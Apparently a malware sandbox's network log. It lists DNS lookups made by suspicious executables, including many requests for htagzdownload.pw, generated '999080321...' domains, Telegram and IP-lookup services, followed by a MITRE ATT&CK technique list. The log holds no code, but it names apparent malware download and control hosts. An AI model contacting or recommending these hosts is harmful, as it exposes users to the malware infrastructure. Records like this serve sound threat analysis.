104.192.141.1
8.8.8.8:53

uyyge5w3ye.2ihsfa.com

dns

gpooe.exe

67 B
83 B
1
1

DNS Request

uyyge5w3ye.2ihsfa.com

DNS Response

207.246.80.14
8.8.8.8:53

bbuseruploads.s3.amazonaws.com

dns

powershell.exe

76 B
113 B
1
1

DNS Request

bbuseruploads.s3.amazonaws.com

DNS Response

52.216.242.204
8.8.8.8:53

privacytools.xyz

dns

SHyqaefepynae.exe

62 B
78 B
1
1

DNS Request

privacytools.xyz

DNS Response

45.139.187.152
8.8.8.8:53

1privacytoolsforyou.site

dns

70 B
135 B
1
1

DNS Request

1privacytoolsforyou.site
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

310 B
5

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw
8.8.8.8:53

www.mediaplayerapp.info

dns

SHyqaefepynae.exe

69 B
85 B
1
1

DNS Request

www.mediaplayerapp.info

DNS Response

89.221.213.3
8.8.8.8:53

uehge4g6gh.2ihsfa.com

dns

huesaa.exe

67 B
83 B
1
1

DNS Request

uehge4g6gh.2ihsfa.com

DNS Response

207.246.80.14
8.8.8.8:53

tttttt.me

dns

5229.exe

55 B
71 B
1
1

DNS Request

tttttt.me

DNS Response

95.216.186.40
8.8.8.8:53

venetrigni.com

dns

60 B
156 B
1
1

DNS Request

venetrigni.com

DNS Response

54.159.227.166

54.159.127.84

52.72.111.72

54.210.223.232

34.231.55.2

34.194.100.165
8.8.8.8:53

click.hooligapps.com

dns

66 B
98 B
1
1

DNS Request

click.hooligapps.com

DNS Response

172.67.172.137

104.21.88.44
8.8.8.8:53

theonlygames.com

dns

62 B
94 B
1
1

DNS Request

theonlygames.com

DNS Response

104.21.24.48

172.67.216.212
8.8.8.8:53

ln.gamesrevenue.com

dns

65 B
81 B
1
1

DNS Request

ln.gamesrevenue.com

DNS Response

204.155.147.176
8.8.8.8:53

nextgencounter.com

dns

128 B
192 B
2
2

DNS Request

nextgencounter.com

DNS Response

104.21.61.108

172.67.209.21

DNS Request

nextgencounter.com

DNS Response

172.67.209.21

104.21.61.108
8.8.8.8:53

main.exdynsrv.com

dns

63 B
152 B
1
1

DNS Request

main.exdynsrv.com

DNS Response

95.211.229.246

95.211.229.245
8.8.8.8:53

my.rtmark.net

dns

118 B
150 B
2
2

DNS Request

my.rtmark.net

DNS Response

139.45.195.8

DNS Request

my.rtmark.net

DNS Response

139.45.195.8
8.8.8.8:53

main.exoclick.com

dns

63 B
152 B
1
1

DNS Request

main.exoclick.com

DNS Response

95.211.229.245

95.211.229.247
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

310 B
5

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw

DNS Request

htagzdownload.pw
8.8.8.8:53

main.realsrv.com

dns

62 B
125 B
1
1

DNS Request

main.realsrv.com

DNS Response

95.211.229.246

95.211.229.247
8.8.8.8:53

mc.yandex.ru

dns

58 B
122 B
1
1

DNS Request

mc.yandex.ru

DNS Response

77.88.21.119

87.250.251.119

87.250.250.119

93.158.134.119
8.8.8.8:53

yourfreecounter.com

dns

325 B
5

DNS Request

yourfreecounter.com

DNS Request

yourfreecounter.com

DNS Request

yourfreecounter.com

DNS Request

yourfreecounter.com

DNS Request

yourfreecounter.com
8.8.8.8:53

yandex.ocsp-responder.com

dns

71 B
179 B
1
1

DNS Request

yandex.ocsp-responder.com

DNS Response

5.45.205.241

5.45.205.242

5.45.205.245

5.45.205.244

5.45.205.243
8.8.8.8:53

collect.installeranalytics.com

dns

powershell.exe

76 B
108 B
1
1

DNS Request

collect.installeranalytics.com

DNS Response

52.23.109.145

54.226.29.2
8.8.8.8:53

fbk.xiaomishop.me

dns

SystemNetworkService

63 B
95 B
1
1

DNS Request

fbk.xiaomishop.me

DNS Response

104.18.9.171

104.18.8.171
8.8.8.8:53

crl.comodoca.com

dns

powershell.exe

62 B
78 B
1
1

DNS Request

crl.comodoca.com

DNS Response

151.139.128.14
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

www.iyiqian.com

dns

powershell.exe

61 B
77 B
1
1

DNS Request

www.iyiqian.com

DNS Response

103.155.92.58
8.8.8.8:53

bbuseruploads.s3.amazonaws.com

dns

powershell.exe

76 B
113 B
1
1

DNS Request

bbuseruploads.s3.amazonaws.com

DNS Response

52.216.171.187
8.8.8.8:53

www.hnsqyyjt.com

dns

powershell.exe

62 B
78 B
1
1

DNS Request

www.hnsqyyjt.com

DNS Response

188.225.87.175
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

api.myip.com

dns

Oy3L2GjKns.exe

58 B
90 B
1
1

DNS Request

api.myip.com

DNS Response

104.21.23.5

172.67.208.45
8.8.8.8:53

api.telegram.org

dns

Oy3L2GjKns.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

sunlabsinternational.com

dns

BITS

70 B
86 B
1
1

DNS Request

sunlabsinternational.com

DNS Response

89.221.213.3
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

999080321newfolder1002002131-service1002.space

dns

460 B
5

DNS Request

999080321newfolder1002002131-service1002.space

DNS Request

999080321newfolder1002002131-service1002.space

DNS Request

999080321newfolder1002002131-service1002.space

DNS Request

999080321newfolder1002002131-service1002.space

DNS Request

999080321newfolder1002002131-service1002.space
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

999080321newfolder1002002231-service1002.space

dns

92 B
157 B
1
1

DNS Request

999080321newfolder1002002231-service1002.space
8.8.8.8:53

999080321newfolder3100231-service1002.space

dns

89 B
154 B
1
1

DNS Request

999080321newfolder3100231-service1002.space
8.8.8.8:53

999080321newfolder1002002431-service1002.space

dns

92 B
157 B
1
1

DNS Request

999080321newfolder1002002431-service1002.space
8.8.8.8:53

999080321newfolder1002002531-service1002.space

dns

92 B
157 B
1
1

DNS Request

999080321newfolder1002002531-service1002.space
8.8.8.8:53

999080321newfolder33417-012425999080321.space

dns

91 B
156 B
1
1

DNS Request

999080321newfolder33417-012425999080321.space
8.8.8.8:53

999080321test125831-service10020125999080321.space

dns

96 B
161 B
1
1

DNS Request

999080321test125831-service10020125999080321.space
8.8.8.8:53

999080321test136831-service10020125999080321.space

dns

96 B
161 B
1
1

DNS Request

999080321test136831-service10020125999080321.space
8.8.8.8:53

999080321test147831-service10020125999080321.space

dns

96 B
161 B
1
1

DNS Request

999080321test147831-service10020125999080321.space
8.8.8.8:53

999080321test146831-service10020125999080321.space

dns

96 B
161 B
1
1

DNS Request

999080321test146831-service10020125999080321.space
8.8.8.8:53

999080321test134831-service10020125999080321.space

dns

96 B
161 B
1
1

DNS Request

999080321test134831-service10020125999080321.space
8.8.8.8:53

999080321est213531-service1002012425999080321.ru

dns

94 B
155 B
1
1

DNS Request

999080321est213531-service1002012425999080321.ru
8.8.8.8:53

999080321yes1t3481-service10020125999080321.ru

dns

92 B
153 B
1
1

DNS Request

999080321yes1t3481-service10020125999080321.ru
8.8.8.8:53

999080321test13561-service10020125999080321.su

dns

92 B
153 B
1
1

DNS Request

999080321test13561-service10020125999080321.su
8.8.8.8:53

999080321test14781-service10020125999080321.info

dns

94 B
154 B
1
1

DNS Request

999080321test14781-service10020125999080321.info
8.8.8.8:53

999080321test13461-service10020125999080321.net

dns

93 B
166 B
1
1

DNS Request

999080321test13461-service10020125999080321.net
8.8.8.8:53

999080321test15671-service10020125999080321.tech

dns

94 B
159 B
1
1

DNS Request

999080321test15671-service10020125999080321.tech
8.8.8.8:53

999080321test12671-service10020125999080321.online

dns

96 B
161 B
1
1

DNS Request

999080321test12671-service10020125999080321.online
8.8.8.8:53

999080321utest1341-service10020125999080321.ru

dns

92 B
153 B
1
1

DNS Request

999080321utest1341-service10020125999080321.ru
8.8.8.8:53

999080321uest71-service100201dom25999080321.ru

dns

92 B
153 B
1
1

DNS Request

999080321uest71-service100201dom25999080321.ru
8.8.8.8:53

999080321test61-service10020125999080321.website

dns

94 B
159 B
1
1

DNS Request

999080321test61-service10020125999080321.website
8.8.8.8:53

999080321test51-service10020125999080321.xyz

dns

90 B
106 B
1
1

DNS Request

999080321test51-service10020125999080321.xyz

DNS Response

45.139.187.152
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

mntbmDSWGvyeyvzEwSe.mntbmDSWGvyeyvzEwSe

dns

Fessura.exe.com

85 B
160 B
1
1

DNS Request

mntbmDSWGvyeyvzEwSe.mntbmDSWGvyeyvzEwSe
8.8.8.8:53

myexternalip.com

dns

19EE.exe

62 B
78 B
1
1

DNS Request

myexternalip.com

DNS Response

34.117.59.81
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

pki.goog

dns

19EE.exe

54 B
70 B
1
1

DNS Request

pki.goog

DNS Response

216.239.32.29
8.8.8.8:53

freegeoip.live

dns

19EE.exe

60 B
92 B
1
1

DNS Request

freegeoip.live

DNS Response

172.67.188.222

104.21.8.254
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

api.faceit.com

dns

60 B
92 B
1
1

DNS Request

api.faceit.com

DNS Response

104.17.62.50

104.17.63.50
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

telete.in

dns

55 B
71 B
1
1

DNS Request

telete.in

DNS Response

195.201.225.248
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

api.ip.sb

dns

powershell.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
8.8.8.8:53

htagzdownload.pw

dns

SHyqaefepynae.exe

62 B
127 B
1
1

DNS Request

htagzdownload.pw
10.10.0.24:56159

106 B
1
8.8.8.8:53

ddueevi.xyz

dns

57 B
73 B
1
1

DNS Request

ddueevi.xyz

DNS Response

193.110.3.139
10.10.0.39:61791

106 B
1
10.10.0.11:53987

106 B
1
8.8.8.8:53

rzGhpbucEOETlljXeAnIzH.rzGhpbucEOETlljXeAnIzH

dns

Mutato.exe.com

91 B
166 B
1
1

DNS Request

rzGhpbucEOETlljXeAnIzH.rzGhpbucEOETlljXeAnIzH
10.10.0.29:60841

106 B
1
10.10.0.38:62692

106 B
1
10.10.0.40:57774

106 B
1
10.10.0.28:53139

106 B
1
10.10.0.35:63051

106 B
1
10.10.0.16:57775

106 B
1
8.8.8.8:53

fairsence.com

dns

SunLabsPlayer.exe

59 B
75 B
1
1

DNS Request

fairsence.com

DNS Response

71.19.146.79
10.10.0.38:5355

106 B
1
10.10.0.35:5355

106 B
1
10.10.0.16:5355

106 B
1
10.10.0.39:5355

106 B
1
10.10.0.29:5355

106 B
1
10.10.0.28:5355

106 B
1
10.10.0.11:5355

106 B
1
10.10.0.24:5355

106 B
1
10.10.0.27:5355

106 B
1
10.10.0.40:5355

106 B
1
10.10.0.34:5355

106 B
1
8.8.8.8:53

api.ip.sb

dns

powershell.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

www.facebook.com

dns

huesaa.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

31.13.64.35
8.8.8.8:53

uyyge5w3ye.2ihsfa.com

dns

gpooe.exe

67 B
83 B
1
1

DNS Request

uyyge5w3ye.2ihsfa.com

DNS Response

207.246.80.14
8.8.8.8:53

iplogger.org

dns

huesaa.exe

58 B
74 B
1
1

DNS Request

iplogger.org

DNS Response

88.99.66.31
8.8.8.8:53

uehge4g6gh.2ihsfa.com

dns

huesaa.exe

67 B
83 B
1
1

DNS Request

uehge4g6gh.2ihsfa.com

DNS Response

207.246.80.14
8.8.8.8:53

999080321test51-service10020125999080321.xyz

dns

90 B
106 B
1
1

DNS Request

999080321test51-service10020125999080321.xyz

DNS Response

45.139.187.152
8.8.8.8:53

www.profitabletrustednetwork.com

dns

78 B
126 B
1
1

DNS Request

www.profitabletrustednetwork.com

DNS Response

192.243.59.12

192.243.59.20

192.243.59.13
8.8.8.8:53

venetrigni.com

dns

60 B
156 B
1
1

DNS Request

venetrigni.com

DNS Response

54.159.127.84

34.194.100.165

52.72.111.72

34.231.55.2

54.210.223.232

54.159.227.166
8.8.8.8:53

www.facebook.com

dns

huesaa.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

31.13.83.36
10.10.0.24:63857

106 B
1
10.10.0.28:62675

106 B
1
10.10.0.16:51973

106 B
1
10.10.0.39:59958

106 B
1
10.10.0.38:53045

106 B
1
10.10.0.29:55104

106 B
1
10.10.0.11:55351

106 B
1
10.10.0.35:50222

106 B
1
10.10.0.38:5355

106 B
1
10.10.0.16:5355

106 B
1
10.10.0.28:5355

106 B
1
10.10.0.24:5355

106 B
1
10.10.0.11:5355

106 B
1
10.10.0.35:5355

106 B
1
10.10.0.29:5355

106 B
1
10.10.0.21:5355

106 B
1
10.10.0.36:5355

106 B
1
10.10.0.23:5355

106 B
1
10.10.0.37:5355

106 B
1
10.10.0.41:5355

106 B
1
10.10.0.15:5355

106 B
1
10.10.0.39:5355

106 B
1
10.10.0.27:5355

106 B
1

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery